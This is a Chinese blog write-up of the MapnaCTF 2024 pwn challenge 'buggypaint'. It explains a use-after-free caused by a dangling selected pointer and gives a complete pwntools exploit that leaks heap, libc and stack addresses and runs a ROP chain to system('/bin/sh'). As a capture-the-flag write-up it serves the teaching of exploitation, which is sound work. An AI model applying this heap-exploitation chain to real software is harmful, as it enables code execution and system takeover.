mapnactf2024 pwn buggypaint

已于 2024-02-06 14:50:53 修改
阅读量451 收藏 9
点赞数 11
文章标签: python 网络安全 安全
于 2024-01-22 16:13:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62172019/article/details/135749706
版权

1.IDA寻找漏洞点

在这里插入图片描述
常规的pwn堆提,有增删改查功能。
select函数做了对qword6060赋值的一个动作:
在这里插入图片描述
qword6060的作用是存储用于show和edit功能的paint结构体指针。
问题出在删除函数没有将qword6060置0导致了UAF的产生。
在这里插入图片描述

2分析add函数还原结构体

  printf("x: ");
  __isoc99_scanf("%lu", &v3);
  printf("y: ");
  __isoc99_scanf("%lu", &v4);
  printf("width: ");
  __isoc99_scanf("%lu", &v5);
  printf("height: ");
  __isoc99_scanf("%lu", &v6);
  printf("color(1=red, 2=green): ");
  __isoc99_scanf("%d", &v2);
  getchar();
  if ( v3 <= 0x1F && v4 <= 0x1F && v5 <= 0x20 && v6 <= 0x20 && v3 + v5 <= 0x20 && v4 + v5 <= 0x20 )
  {
    if ( v2 > 0 && v2 <= 2 )
    {
      if ( qword_4060[32 * v3 + v4] )
      {
        puts("The selected cell is full");
      }
      else
      {
        v7 = malloc(0x30uLL);
        *(_QWORD *)v7 = v3;
        *((_QWORD *)v7 + 1) = v4;
        *((_QWORD *)v7 + 3) = v5;
        *((_QWORD *)v7 + 4) = v6;
        if ( v2 == 1 )
          v0 = "\x1B[31m";
        else
          v0 = "\x1B[32m";
        *((_QWORD *)v7 + 2) = v0;
        *((_QWORD *)v7 + 5) = malloc(v5 * v6);
        memset(*((void **)v7 + 5), 0, v6 * v5);
        printf("content: ");
        read(0, *((void **)v7 + 5), v6 * v5);
        qword_4060[32 * v3 + v4] = v7;
      }
    }

可以分析出paint结构体如下
[+0:x,
+8:y,
+16:des,
+24:width,
+32:height,
+40:&context]

3漏洞利用

题目所给库版本是2.35存在tcache机制,依据tache后进先出的机制,可以先申请一个context大小为0x40的块和三块context超过0x70大小的块(方便待会泄露libc基址)。
申请完如下:
在这里插入图片描述
然后释放三个0x40块到空闲链表中。
select(0,0)
现在qword指向0x55f2bf0b73a0
在这里插入图片描述

在这里插入图片描述
现在申请一次context为0x40的块(称为a块) 这样的话a块就可以控制paint结构体,也就间接控制了一个paint结构体。只需要重复释放申请a块就可以造成多次任意读和任意写。用任意写将链表的数量改大方便块进入unsortedbin内,然后任意读泄露库的地址。接着任意读库里的environ变量就可以获得栈地址,任意写栈完成rop。最后ret退出拿到权限。
脚本如下:

from pwn import*
def gd():
 gdb.attach(p)
 pause()
def add(x,y,x1,y1,data):
 p.recvuntil(b'> ')
 p.sendline(b'1')
 p.recvuntil(b'x: ')
 p.sendline(str(x).encode())
 p.recvuntil(b'y: ')
 p.sendline(str(y).encode())
 p.recvuntil(b'width: ')
 p.sendline(str(x1).encode())
 p.recvuntil(b'height: ')
 p.sendline(str(y1).encode())
 p.recvuntil(b'color(1=red, 2=green): ')
 p.sendline(b'1')
 p.recvuntil(b'content: ')
 p.send(data)
def free(x,y):
 p.recvuntil(b'> ')
 p.sendline(b'2')
 p.recvuntil(b'x: ')
 p.sendline(str(x).encode())
 p.recvuntil(b'y: ')
 p.sendline(str(y).encode())
def select(x,y):
 p.recvuntil(b'> ')
 p.sendline(b'3')
 p.recvuntil(b'x: ')
 p.sendline(str(x).encode())
 p.recvuntil(b'y: ')
 p.sendline(str(y).encode())
def edit(data): 
 p.recvuntil(b'> ')
 p.sendline(b'4')
 p.recvuntil(b'New content: ')
 p.send(data)
def show():
 p.recvuntil(b'> ')
 p.sendline(b'5') 

p=process("./pwn")
libc = ELF("libc.so.6")
add(0,0,8,6,b'a')
select(0,0)
free(0,0)
show()
p.recvline()
heap_base = (u64(p.recv(7).ljust(8,b'\x00'))<<12)
heap_key = heap_base
print(hex(heap_base))
add(0,0,8,6,b'a')
add(0,1,8,20,b'a')
add(0,2,8,20,b'a')
add(0,3,8,20,b'a')

free(0,0)
free(0,1)

add(0,1,8,6,b'a' * 8+ p64(0) * 2 + p64(0x10) * 2 + p64(heap_base+0x20))
edit(b'\x07' * 8)
free(0,1)
free(0,2)
add(0,2,8,20,b'a')
add(0,1,8,6,b'a' * 8+ p64(0) * 2 + p64(0x10) * 2 + p64(heap_base+0x450))
show()
p.recvline()
libc_base = (u64(p.recv(7).ljust(8,b'\x00'))) - 0x219ce0
print(hex(libc_base))
environ = libc_base + libc.sym['environ']
free(0,1)
add(0,1,8,6,b'a' * 8+ p64(0) * 2 + p64(0x10) * 2 + p64(environ))
show()
p.recvline()
stack = (u64(p.recv(7).ljust(8,b'\x00'))) - 0x120
free(0,1)
add(0,1,8,6,b'a' * 8+ p64(0) * 2 + p64(0x10) * 2 + p64(stack))
sh = libc_base + next(libc.search(b"/bin/sh"))
sys_addr = libc_base + libc.sym['system']
pop_rdi = libc_base + 0x000000000002a3e5
ret_addr = libc_base + 0x000000000002db7d
edit(p64(pop_rdi) + p64(sh) + p64(ret_addr) +  p64(sys_addr))
p.sendline(b'cat_of_fish')
#gd()
p.interactive()

成功getshell
在这里插入图片描述

萌の鱼
关注
LitCTF 2024 pwn AK
YX-hueimie
06-02 1511
探姬姐姐办的比赛,所以就打了一下。尽管是“新生赛”,但pwn方向并不是很新生,5道堆题+1道栈题,可能是出题的师傅比较少吧,应该是只有两位。我了解到这个比赛的时候已经要开赛了,投稿也来不及,要不然就投几道我的得意门生了。
[CTF]Hgame2024-PWN部分wp
2301_79880752的博客
02-11 2115
签到题,直接nc得到flag。
CISCN2024 WP 部分
m0_61926940的博客
05-20 1063
libc: 2.23golang编写的一道栈题,有一个无限制的输入,通过gdb动调找出偏移量,覆盖ret地址为main_main2,开启一个bash传统菜单堆题,libc2.23,UAF漏洞,有一次free和一次show,我们又要泄露libc又要打一次UAF,明显一次free是不够的,所以选择打一次house of orange(呼应上了),然后UAF打malloc_hook​argv = f''​pause()​cmd(1)​cmd(2)​cmd(3)​cmd(4)​。
kali中pwn环境的配置-一步到位
llovewuzhengzi的博客
04-26 760
为了防止有时候出现某些问题需要重新配置pwn环境,由于每次一个个搜属实太麻烦了,这里将其做个汇总,方便自己下次需要重新配置,有需要的工具会实时更新在这篇博客中…………
2024 CygenixCTF re&pwn 部分wp
wmr66的博客
08-28 353
Easy Peasy Apk;Password Encrypt;Classic;Gadgets
2024NKCTF-pwn
03-25
2024NKCTF_pwn
pwn_debug:旨在帮助快速构建对CTF Pwn游戏的利用
05-14
pwn_debug pwn_debug-基于pwntools的ctf pwns的辅助调试工具 建议您在获得“用法和安装”的完整说明。 这只是一个简单的描述。 入门 安装pwn_debug git clone https://github.com/ray-cp/pwn_debug.git cd pwn_...
browser_pwn:浏览器pwn,现在主要工作
03-22
浏览器Pwn,顾名思义,是指针对浏览器的安全攻防技术,主要集中在发现并利用浏览器中的漏洞进行攻击。在这个领域,V8_pwn 和 JSC_pwn 是两个关键的子领域,分别关注Google Chrome浏览器的V8 JavaScript引擎和Apple ...
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
pwn题目中的libc-2.27.so文件
04-11
pwn题,有些时候题目不给这个文件,这里是这个库的文件。
Python办公自动化案例(二):对比两个Excel数据内容并标出不同
衍生星球的博客
09-14 147
在数据处理和分析的日常工作中,我们经常需要比较两个Excel文件的差异。这可能是为了验证数据的一致性、检查数据的准确性,或者在版本控制中追踪更改。手动比较这些文件不仅耗时,而且容易出错。幸运的是,Python的openpyxl库提供了一种自动化这一过程的方法。
蒙特卡罗方法——布丰投针实验近似计算圆周率python代码实现
2301_79376014的博客
09-09 515
蒙特卡罗——布丰实验
Python实现多线程、多进程及协程
qq_42568323的博客
09-09 1104
本文详细介绍了 Python 中多线程、多进程和协程的并发模型及其实现方式,并通过具体场景演示了如何使用面向对象思想实现这些模型。在实际应用中,应根据任务的类型和需求选择合适的并发模型,从而优化程序的性能和资源利用率。本文将详细介绍 Python 中的多线程、多进程和协程的概念及其实现方式,并通过具体场景展示如何在 Python 中使用面向对象的思想实现这些并发模型。接下来,我们通过一个计算密集型任务的示例来演示多进程的实现:计算一系列大数字的阶乘。主程序中创建并启动了多个计算进程,并使用。
Python——俄罗斯方块
最新发布
2302_81225694的博客
09-14 226
这段代码使用了Pygame库来实现游戏的图形界面,通过键盘控制方块的移动和旋转。游戏循环不断更新方块的位置和网格状态,并绘制在屏幕上。在方块达到底部或无法继续移动时,判断是否有满行,并清除满行的方块。游戏会根据方块的状态和移动情况不断更新,直到无法继续下落为止,游戏结束。俄罗斯方块游戏是一款经典的益智游戏,通常使用编程语言Python来实现。请注意,这只是一个简单的示例,可能还有一些功能和优化方面的改进。您可以根据自己的需求进行修改和扩展。
JIT编译器
Flying_Fish_roe的博客
09-11 564
JIT(Just-In-Time,实时编译)编译器是 Java 虚拟机(JVM)中的一项重要技术,用于将 Java 字节码(Bytecode)在运行时动态编译为机器码。Java 程序最初通过编译器(如javac)将源代码编译为字节码,字节码在 JVM 中解释执行。然而,由于解释执行每次都需要逐条翻译字节码指令为机器指令,这种方式效率较低。为了解决性能问题,JIT 编译器在程序运行时将热点代码编译为机器码,从而提高运行效率。JIT 编译器是 Java“编译型”和“解释型”语言的结合特性的重要体现之一。
Python 检测人脸筛选指定尺寸人脸图片
刚刚入门的小码农
09-09 684
主要功能是处理一个指定文件夹中的所有图像文件(.jpg和.png),并根据图像中检测到的人脸特征,筛选和移动符合条件的图像。
python-游戏自动化(二)(OpenCV图像运用基础)
qiqi776532的博客
09-11 1089
图像二值化可以简单理解成,就是把图像转换成黑白两种颜色(一般用于提取图像特征),二值化图像:只有两种颜色,黑和白,255白色,0黑色。结合前面学习的彩色图像和灰度图像,一起来做个对比。彩色图像:三个通道0-255,0-255,0-255,所以可以有2^24位空间灰度图像:一个通道0-255,所以有256种颜色二值图像:只有两种颜色,黑和白,255白色,0黑色图像匹配,就是从一个图像中找出想要的小图像,打个比方:就好比拿着老师的头像寸照,然后去师的大学毕业照里面一个个的头像对照然后将老师找出来。
JS笔记
2201_76100326的博客
09-11 872
javascript中的对象分为3种:自定义对象,内置对象,浏览器对象 JavaScript 中的所有事物都是对象:字符串、数字、数组、日期,等等。在 JavaScript 中,对象是拥有属性和方法的数据。属性是与对象相关的值。方法是能够在对象上执行的动作。.关键词()
pip 阿里云镜像报错 certificate verify failed: unable to get local issuer certificate
m0_74253823的博客
09-10 447
在没有管理员身份,且有防火墙限制的电脑上,pip安装​python库包失败。​但是在普通的电脑上安装正常。​解决方案:本地电脑上信任宿主主机trusted-host。
二进制利用入门:Pwn挑战解析
"Introduction-to-Pwn.pdf - pwn学习手册" 在网络安全领域,"pwn"是一种专门针对二进制漏洞利用的技术,它涉及到如何利用软件中的安全漏洞来控制或破坏系统。"Introduction to Pwn"这份手册是为那些对中级到高级的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值